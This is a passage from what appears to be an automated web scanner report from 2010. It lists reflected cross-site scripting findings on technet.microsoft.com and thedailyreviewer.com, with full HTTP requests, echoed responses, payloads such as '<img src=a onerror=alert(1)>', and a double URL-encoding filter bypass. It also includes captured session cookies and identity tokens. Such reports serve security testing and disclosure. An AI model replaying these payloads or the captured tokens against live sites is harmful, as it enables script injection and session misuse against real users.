17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:05 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryaa021"><a>619786c76b7/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1132%2522%253e%253ca%253eead51d01886 was submitted in the REST URL parameter 3. This input was echoed as f1132"><a>ead51d01886 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/default(loband).aspxf1132%2522%253e%253ca%253eead51d01886 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/default(loband).aspxf1132"><a>ead51d01886" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bf8aa<img%20src%3da%20onerror%3dalert(1)>91a0ff23fcb was submitted in the REST URL parameter 3. This input was echoed as bf8aa<img src=a onerror=alert(1)>91a0ff23fcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/abf8aa<img%20src%3da%20onerror%3dalert(1)>91a0ff23fcb HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c758f11375b62597a0e1b94ffaad4436; expires=Wed, 12-Dec-2035 00:30:41 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with abf8aa<img src=a onerror=alert(1)>91a0ff23fcb</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3df1<img%20src%3da%20onerror%3dalert(1)>f6ca78564af was submitted in the REST URL parameter 3. This input was echoed as c3df1<img src=a onerror=alert(1)>f6ca78564af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/bc3df1<img%20src%3da%20onerror%3dalert(1)>f6ca78564af HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:42 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f30dab902adfef78bd9ed1d56b7bf8c2; expires=Wed, 12-Dec-2035 00:30:42 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with bc3df1<img src=a onerror=alert(1)>f6ca78564af</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5310f<img%20src%3da%20onerror%3dalert(1)>dee4f1b5745 was submitted in the REST URL parameter 3. This input was echoed as 5310f<img src=a onerror=alert(1)>dee4f1b5745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/c5310f<img%20src%3da%20onerror%3dalert(1)>dee4f1b5745 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:47 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=317df6a4dcf6308dc5b0d2dfc5e944a7; expires=Wed, 12-Dec-2035 00:30:47 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with c5310f<img src=a onerror=alert(1)>dee4f1b5745</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 56a98<img%20src%3da%20onerror%3dalert(1)>b0e028b2992 was submitted in the REST URL parameter 3. This input was echoed as 56a98<img src=a onerror=alert(1)>b0e028b2992 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/d56a98<img%20src%3da%20onerror%3dalert(1)>b0e028b2992 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:58 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1a962f7c9b1fb720018ec62c98515b3e; expires=Wed, 12-Dec-2035 00:30:58 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with d56a98<img src=a onerror=alert(1)>b0e028b2992</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3161a<img%20src%3da%20onerror%3dalert(1)>e459197fbe8 was submitted in the REST URL parameter 3. This input was echoed as 3161a<img src=a onerror=alert(1)>e459197fbe8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/e3161a<img%20src%3da%20onerror%3dalert(1)>e459197fbe8 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:55 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f4ef5c4848cc29926212c37c3fdc2115; expires=Wed, 12-Dec-2035 00:30:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with e3161a<img src=a onerror=alert(1)>e459197fbe8</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70715<img%20src%3da%20onerror%3dalert(1)>009885355d4 was submitted in the REST URL parameter 3. This input was echoed as 70715<img src=a onerror=alert(1)>009885355d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/f70715<img%20src%3da%20onerror%3dalert(1)>009885355d4 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:00 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=135035616262fb54bdeda89b7831ecba; expires=Wed, 12-Dec-2035 00:31:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with f70715<img src=a onerror=alert(1)>009885355d4</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c109<img%20src%3da%20onerror%3dalert(1)>704c2e449f2 was submitted in the REST URL parameter 3. This input was echoed as 9c109<img src=a onerror=alert(1)>704c2e449f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/g9c109<img%20src%3da%20onerror%3dalert(1)>704c2e449f2 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:56 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=cf4ebbb2602638764445ded319810ca5; expires=Wed, 12-Dec-2035 00:30:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with g9c109<img src=a onerror=alert(1)>704c2e449f2</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 230bb<img%20src%3da%20onerror%3dalert(1)>e08fcc684b6 was submitted in the REST URL parameter 3. This input was echoed as 230bb<img src=a onerror=alert(1)>e08fcc684b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/h230bb<img%20src%3da%20onerror%3dalert(1)>e08fcc684b6 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:48 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5c51009db4001393b5f636eb3287d208; expires=Wed, 12-Dec-2035 00:30:49 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with h230bb<img src=a onerror=alert(1)>e08fcc684b6</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46922<img%20src%3da%20onerror%3dalert(1)>083575eb85a was submitted in the REST URL parameter 3. This input was echoed as 46922<img src=a onerror=alert(1)>083575eb85a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/i46922<img%20src%3da%20onerror%3dalert(1)>083575eb85a HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:58 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=58a3c1cee207541224ac9aa453461772; expires=Wed, 12-Dec-2035 00:30:58 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with i46922<img src=a onerror=alert(1)>083575eb85a</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e2a41<img%20src%3da%20onerror%3dalert(1)>995f2589ceb was submitted in the REST URL parameter 3. This input was echoed as e2a41<img src=a onerror=alert(1)>995f2589ceb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/je2a41<img%20src%3da%20onerror%3dalert(1)>995f2589ceb HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:02 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=4eea54fd0843137f02a9e881663c26dc; expires=Wed, 12-Dec-2035 00:31:03 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with je2a41<img src=a onerror=alert(1)>995f2589ceb</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0dd8<img%20src%3da%20onerror%3dalert(1)>826824ff5c2 was submitted in the REST URL parameter 3. This input was echoed as a0dd8<img src=a onerror=alert(1)>826824ff5c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ka0dd8<img%20src%3da%20onerror%3dalert(1)>826824ff5c2 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:59 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c6bdb685d61149fbbbac72e754d3efc1; expires=Wed, 12-Dec-2035 00:30:59 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ka0dd8<img src=a onerror=alert(1)>826824ff5c2</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eaab7<img%20src%3da%20onerror%3dalert(1)>a7e88099fd was submitted in the REST URL parameter 3. This input was echoed as eaab7<img src=a onerror=alert(1)>a7e88099fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/leaab7<img%20src%3da%20onerror%3dalert(1)>a7e88099fd HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:57 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5397a6a0cb92740d8cd5928a13bb24ce; expires=Wed, 12-Dec-2035 00:30:57 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with leaab7<img src=a onerror=alert(1)>a7e88099fd</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52cd3<img%20src%3da%20onerror%3dalert(1)>bc6908de3fc was submitted in the REST URL parameter 3. This input was echoed as 52cd3<img src=a onerror=alert(1)>bc6908de3fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/m52cd3<img%20src%3da%20onerror%3dalert(1)>bc6908de3fc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
